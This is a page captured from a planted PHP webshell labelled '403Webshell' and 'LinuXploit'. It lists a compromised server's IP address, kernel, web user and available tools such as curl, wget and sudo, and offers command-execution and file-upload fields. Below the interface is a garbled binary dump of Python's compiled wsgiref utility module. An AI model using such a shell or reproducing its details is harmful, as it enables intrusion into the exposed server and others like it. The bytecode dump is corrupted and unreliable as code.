403Webshell
Server IP : 178.105.222.151  /  Your IP : 216.73.216.38
Web Server : nginx/1.28.3
System : Linux MNK 7.0.0-15-generic #15-Ubuntu SMP PREEMPT_DYNAMIC Wed Apr 22 16:06:43 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3.14/wsgiref/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.14/wsgiref/__pycache__/util.cpython-314.pyc
+
��3jq��r�Rt^RIt.R
Ot!RR4tRtRtRRltRtRt0RmPt
R	tR#)
z$Miscellaneous WSGI-related UtilitiesN�FileWrapperc�:a�]tRt^toRtRRltRtRtRtVt	R#)rz1Wrapper to convert file-like objects to iterablesc�h�WnW n\VR4'dVPVnR#R#)�closeN)�filelike�blksize�hasattrr)�selfrrs&&&�#/usr/lib/python3.14/wsgiref/util.py�__init__�FileWrapper.__init__s)�� �
����8�G�$�$�!���D�J�%�c��V#�N�)r	s&r
�__iter__�FileWrapper.__iter__s���r
c�l�VPPVP4pV'dV#\hr)r�readr�
StopIteration)r	�datas& r
�__next__�FileWrapper.__next__s(���}�}�!�!�$�,�,�/����K��r
)rrrN)i )
�__name__�
__module__�__qualname__�__firstlineno__�__doc__rrr�__static_attributes__�__classdictcell__)�
__classdict__s@r
rrs����;�(���r
c�6�VPR4R9dR#R#)zMReturn a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'
    �HTTPS�https�http)�yes�on�1)�get)�environs&r
�guess_schemer*s���{�{�7��/�/��r
c��VR,R,p^RIHpVPR4'dWR,,
pMhWR,,
pVR,R8Xd'VR,R8wdVR	VR,,,
pM%VR,R
8wdVR	VR,,,
pY!VPR4;'gRR
R7,
pV#)z@Return the application's base URI (no PATH_INFO or QUERY_STRING)�wsgi.url_schemez://��quote�	HTTP_HOST�SERVER_NAMEr#�SERVER_PORT�443�:�80�SCRIPT_NAME�/�latin1)�encoding)�urllib.parser.r()r)�urlr.s&  r
�application_urir;%s���
�#�
$�U�
*�C�"��{�{�;����{�#�#���}�%�%���$�%��0��}�%��.��s�W�]�3�3�3����}�%��-��s�W�]�3�3�3���5����]�+�2�2�s�X�F�F�C��Jr
c�(�\V4p^RIHpV!VPRR4RRR7pVPR4'gW$R,,
pMW$,
pV'd/VPR	4'dVR
VR	,,,
pV#)zBReturn the full request URI, optionally including the query stringr-�	PATH_INFO�z/;=,r7)�safer8r5:�NN�QUERY_STRING�?)r;r9r.r()r)�
include_queryr:r.�	path_infos&&   r
�request_urirE9su��
�'�
"�C�"��g�k�k�+�b�1���R�I��;�;�}�%�%���}����������^�4�4��s�W�^�,�,�,���Jr
c��VPRR4pV'gR#VPR4pV^RUu.uFq3'gKVR8wgKVNK	upV^R%V^,pV^VPRR4p\P!VR,V,4pVP	R4'dVRRpV'g!VP	R4'g
VR,
pWPR&RPV4VR&VR8XdRpV#uupi)a6Shift a name from PATH_INFO to SCRIPT_NAME, returning it

If there are no remaining path segments in PATH_INFO, return None.
Note: 'environ' is modified in-place; use a copy if you need to keep
the original PATH_INFO or SCRIPT_NAME.

Note: when PATH_INFO is just a '/', this returns '' and appends a trailing
'/' to SCRIPT_NAME, even though empty path segments are normally ignored,
and SCRIPT_NAME doesn't normally end in a '/'.  This is intentional
behavior, to ensure that an application can tell the difference between
'/x' and '/x/' when traversing to objects.
r=r>Nr6�.r5���)r(�split�	posixpath�normpath�endswith�join)r)rD�
path_parts�p�name�script_names&     r
�shift_path_inforRFs������K��+�I�������%�J�#-�a��#3�F�#3�a�q��Q�#�X���#3�F�J�q����a�=�D��1�
��+�+�m�B�/�K��$�$�[��_�T�%9�:�K����C� � �!�#�2�&����,�,�S�1�1��s���(�M�� �X�X�j�1�G�K���S�y����K��+Gs�	D�D�Dc���VPRR4VPRR4VPRVR,4VPRR4RV9d,R	V9d%VPRR
4VPR	R4TPRR4VPR
^4VPR^4VPR^4^RIHpHpVPRV!44VPRV!44VPR\	V44VR,R8XdVPRR4R#VR,R8XdVPRR4R#R#)aUpdate 'environ' with trivial defaults for testing purposes

This adds various parameters required for WSGI, including HTTP_HOST,
SERVER_NAME, SERVER_PORT, REQUEST_METHOD, SCRIPT_NAME, PATH_INFO,
and all of the wsgi.* variables.  It only supplies default values,
and does not replace any existing settings for these variables.

This routine is intended to make it easier for unit tests of WSGI
servers and applications to set up dummy environments.  It should *not*
be used by actual WSGI servers or applications, since the data is fake!
r0z	127.0.0.1�SERVER_PROTOCOLzHTTP/1.0r/�REQUEST_METHOD�GETr5r=r>r6zwsgi.versionz
wsgi.run_oncezwsgi.multithreadzwsgi.multiprocess)�StringIO�BytesIOz
wsgi.inputzwsgi.errorsr,r$r1r4r#r2N)r@�)�
setdefault�iorWrXr*)r)rWrXs&  r
�setup_testing_defaultsr\os:�����}�[�1����(��4����{�7�=�#9�:����'��.��G�#��7�(B����=��,����;�s�+����~�u�-������*����)�1�-����*�A�.�$����|�W�Y�/����}�h�j�1����(��g�)>�?�� �!�6�)����=�$�/�	�"�	#�W�	,����=�%�0�
-r
c�4�\VP44#)z?Return true if 'header_name' is an HTTP/1.1 "Hop-by-Hop" header)�_hoppish�lower)�header_names&r
�
is_hop_by_hopra�s���K�%�%�'�(�(r
)rr*r;rErRr\ra)T>�te�upgrade�trailers�
connection�
keep-alive�transfer-encoding�proxy-authenticate�proxy-authorization)rrJ�__all__rr*r;rErRr\�__contains__r^rarr
r
�<module>rlsM��*������$��(�'�R$1�P��,�		�)r

Youez - 2016 - github.com/yon3zu
LinuXploit